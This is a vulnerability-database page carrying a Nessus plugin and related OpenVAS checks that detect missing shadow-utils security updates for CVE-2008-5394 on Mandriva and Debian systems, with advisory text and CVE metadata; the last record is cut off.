Search...

Mandriva Linux Security Advisory : shadow-utils (MDVSA-2009:062)

2009-04-23T00:00:00

ID MANDRIVA_MDVSA-2009-062.NASL
Type nessus
Reporter This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.
Modified 2009-04-23T00:00:00

Description

A security vulnerability has been identified and fixed in login application from shadow-utils, which could allow local users in the utmp group to overwrite arbitrary files via a symlink attack on a temporary file referenced in a line (aka ut_line) field in a utmp entry (CVE-2008-5394).

The updated packages have been patched to prevent this.

Note: Mandriva Linux is using login application from util-linux-ng by default, and therefore is not affected by this issue on default configuration.

                                        
                                            #%NASL_MIN_LEVEL 70300

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Mandriva Linux Security Advisory MDVSA-2009:062. 
# The text itself is copyright (C) Mandriva S.A.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(36812);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2008-5394");
  script_xref(name:"MDVSA", value:"2009:062");

  script_name(english:"Mandriva Linux Security Advisory : shadow-utils (MDVSA-2009:062)");
  script_summary(english:"Checks rpm output for the updated package");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Mandriva Linux host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"A security vulnerability has been identified and fixed in login
application from shadow-utils, which could allow local users in the
utmp group to overwrite arbitrary files via a symlink attack on a
temporary file referenced in a line (aka ut_line) field in a utmp
entry (CVE-2008-5394).

The updated packages have been patched to prevent this.

Note: Mandriva Linux is using login application from util-linux-ng by
default, and therefore is not affected by this issue on default
configuration."
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Update the affected shadow-utils package."
  );
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_cwe_id(59);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:shadow-utils");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2008.0");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2008.1");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2009.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2009/03/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/04/23");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.");
  script_family(english:"Mandriva Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);


flag = 0;
if (rpm_check(release:"MDK2008.0", reference:"shadow-utils-4.0.12-8.1mdv2008.0", yank:"mdv")) flag++;

if (rpm_check(release:"MDK2008.1", reference:"shadow-utils-4.0.12-9.1mdv2008.1", yank:"mdv")) flag++;

if (rpm_check(release:"MDK2009.0", reference:"shadow-utils-4.0.12-17.1mdv2009.0", yank:"mdv")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "MANDRIVA_MDVSA-2009-062.NASL", "bulletinFamily": "scanner", "title": "Mandriva Linux Security Advisory : shadow-utils (MDVSA-2009:062)", "description": "A security vulnerability has been identified and fixed in login\napplication from shadow-utils, which could allow local users in the\nutmp group to overwrite arbitrary files via a symlink attack on a\ntemporary file referenced in a line (aka ut_line) field in a utmp\nentry (CVE-2008-5394).\n\nThe updated packages have been patched to prevent this.\n\nNote: Mandriva Linux is using login application from util-linux-ng by\ndefault, and therefore is not affected by this issue on default\nconfiguration.", "published": "2009-04-23T00:00:00", "modified": "2009-04-23T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/36812", "reporter": "This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.", "references": [], "cvelist": ["CVE-2008-5394"], "type": "nessus", "lastseen": "2021-01-07T11:52:04", "edition": 24, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5394"]}, {"type": "ubuntu", "idList": ["USN-695-1"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063272", "OPENVAS:63555", "OPENVAS:840229", "OPENVAS:63479", "OPENVAS:136141256231063479", "OPENVAS:63272", "OPENVAS:136141256231063555"]}, {"type": "gentoo", "idList": ["GLSA-200903-24"]}, {"type": "exploitdb", "idList": ["EDB-ID:7313"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1709-1:DE4E6"]}, {"type": "seebug", "idList": ["SSV:4572"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200903-24.NASL", "UBUNTU_USN-695-1.NASL", "DEBIAN_DSA-1709.NASL"]}], "modified": "2021-01-07T11:52:04", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-01-07T11:52:04", "rev": 2}, "vulnersScore": 6.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:062. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36812);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5394\");\n script_xref(name:\"MDVSA\", value:\"2009:062\");\n\n script_name(english:\"Mandriva Linux Security Advisory : shadow-utils (MDVSA-2009:062)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A security vulnerability has been identified and fixed in login\napplication from shadow-utils, which could allow local users in the\nutmp group to overwrite arbitrary files via a symlink attack on a\ntemporary file referenced in a line (aka ut_line) field in a utmp\nentry (CVE-2008-5394).\n\nThe updated packages have been patched to prevent this.\n\nNote: Mandriva Linux is using login application from util-linux-ng by\ndefault, and therefore is not affected by this issue on default\nconfiguration.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected shadow-utils package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:shadow-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"shadow-utils-4.0.12-8.1mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", reference:\"shadow-utils-4.0.12-9.1mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"shadow-utils-4.0.12-17.1mdv2009.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "pluginID": "36812", "cpe": ["cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:shadow-utils"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "/bin/login in shadow 4.0.18.1 in Debian GNU/Linux, and probably other Linux distributions, allows local users in the utmp group to overwrite arbitrary files via a symlink attack on a temporary file referenced in a line (aka ut_line) field in a utmp entry.", "edition": 3, "cvss3": {}, "published": "2008-12-09T00:30:00", "title": "CVE-2008-5394", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5394"], "modified": "2018-10-11T20:55:00", "cpe": ["cpe:/a:debian:shadow:4.0.18.1"], "id": "CVE-2008-5394", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5394", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:debian:shadow:4.0.18.1:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T00:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5394"], "description": "Paul Szabo discovered a race condition in login. While setting up \ntty permissions, login did not correctly handle symlinks. If a local \nattacker were able to gain control of the system utmp file, they could \ncause login to change the ownership and permissions on arbitrary files, \nleading to a root privilege escalation.", "edition": 5, "modified": "2008-12-18T00:00:00", "published": "2008-12-18T00:00:00", "id": "USN-695-1", "href": "https://ubuntu.com/security/notices/USN-695-1", "title": "shadow vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:56:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing an update to shadow-utils\nannounced via advisory MDVSA-2009:062.", "modified": "2017-07-06T00:00:00", "published": "2009-03-07T00:00:00", "id": "OPENVAS:63479", "href": "http://plugins.openvas.org/nasl.php?oid=63479", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:062 (shadow-utils)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_062.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:062 (shadow-utils)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A security vulnerability has been identified and fixed in login\napplication from shadow-utils, which could allow local users in\nthe utmp group to overwrite arbitrary files via a symlink attack on\na temporary file referenced in a line (aka ut_line) field in a utmp\nentry (CVE-2008-5394).\n\nThe updated packages have been patched to prevent this.\n\nNote: Mandriva Linux is using login application from util-linux-ng\nby default, and therefore is not affected by this issue on default\nconfiguration.\n\nAffected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:062\";\ntag_summary = \"The remote host is missing an update to shadow-utils\nannounced via advisory MDVSA-2009:062.\";\n\n \n\nif(description)\n{\n script_id(63479);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-07 21:47:03 +0100 (Sat, 07 Mar 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:062 (shadow-utils)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~8.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~9.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~17.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.3~8.3.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~2.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.3~8.3.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing an update to shadow\nannounced via advisory DSA 1709-1.", "modified": "2017-07-07T00:00:00", "published": "2009-01-26T00:00:00", "id": "OPENVAS:63272", "href": "http://plugins.openvas.org/nasl.php?oid=63272", "type": "openvas", "title": "Debian Security Advisory DSA 1709-1 (shadow)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1709_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1709-1 (shadow)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary files,\nleading to a root privilege escalation.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.0.18.1-7+etch1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.1.1-6.\n\nWe recommend that you upgrade your shadow package.\";\ntag_summary = \"The remote host is missing an update to shadow\nannounced via advisory DSA 1709-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201709-1\";\n\n\nif(description)\n{\n script_id(63272);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-26 18:18:20 +0100 (Mon, 26 Jan 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1709-1 (shadow)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.18.1-7+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.18.1-7+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing an update to shadow\nannounced via advisory DSA 1709-1.", "modified": "2018-04-06T00:00:00", "published": "2009-01-26T00:00:00", "id": "OPENVAS:136141256231063272", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063272", "type": "openvas", "title": "Debian Security Advisory DSA 1709-1 (shadow)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1709_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1709-1 (shadow)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary files,\nleading to a root privilege escalation.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.0.18.1-7+etch1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.1.1-6.\n\nWe recommend that you upgrade your shadow package.\";\ntag_summary = \"The remote host is missing an update to shadow\nannounced via advisory DSA 1709-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201709-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63272\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-26 18:18:20 +0100 (Mon, 26 Jan 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1709-1 (shadow)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.18.1-7+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.18.1-7+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing an update to shadow-utils\nannounced via advisory MDVSA-2009:062.", "modified": "2018-04-06T00:00:00", "published": "2009-03-07T00:00:00", "id": "OPENVAS:136141256231063479", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063479", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:062 (shadow-utils)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_062.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:062 (shadow-utils)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A security vulnerability has been identified and fixed in login\napplication from shadow-utils, which could allow local users in\nthe utmp group to overwrite arbitrary files via a symlink attack on\na temporary file referenced in a line (aka ut_line) field in a utmp\nentry (CVE-2008-5394).\n\nThe updated packages have been patched to prevent this.\n\nNote: Mandriva Linux is using login application from util-linux-ng\nby default, and therefore is not affected by this issue on default\nconfiguration.\n\nAffected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:062\";\ntag_summary = \"The remote host is missing an update to shadow-utils\nannounced via advisory MDVSA-2009:062.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63479\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-07 21:47:03 +0100 (Sat, 07 Mar 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:062 (shadow-utils)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~8.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~9.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~17.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.3~8.3.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~2.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.3~8.3.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing updates announced 